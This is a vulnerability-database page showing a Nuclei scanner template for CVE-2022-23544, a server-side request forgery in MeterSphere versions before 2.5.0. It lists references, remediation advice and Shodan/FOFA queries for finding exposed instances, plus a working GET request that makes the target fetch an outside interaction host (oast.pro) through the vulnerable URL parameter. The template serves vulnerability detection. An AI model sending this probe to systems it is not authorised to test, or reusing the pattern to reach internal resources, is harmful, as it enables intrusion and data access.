Lucene search
K

MeterSphere < 2.5.0 SSRF

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

MeterSphere SSRF vulnerability in < 2.5.

Related
Refs
Code
id: CVE-2022-23544

info:
  name: MeterSphere < 2.5.0 SSRF
  author: j4vaovo
  severity: medium
  description: |
    MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23544
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj
    - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23544
    cwe-id: CWE-918,CWE-79
    epss-score: 0.01607
    epss-percentile: 0.72941
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query:
      - html:"metersphere"
      - http.html:"metersphere"
    fofa-query:
      - title="MeterSphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve2022,cve,metersphere,ssrf,oast,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402201ac16ec8ea20631dc36a0bc0dd56e4fe881f8d0cd9d2d792a12c9c4f87beb3a802205474fed6a2ec5efa4ff3e371ff2d697da50f7133c025a3dd38d621b39929bb9f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1 - 7.2
EPSS0.01607
SSVC
25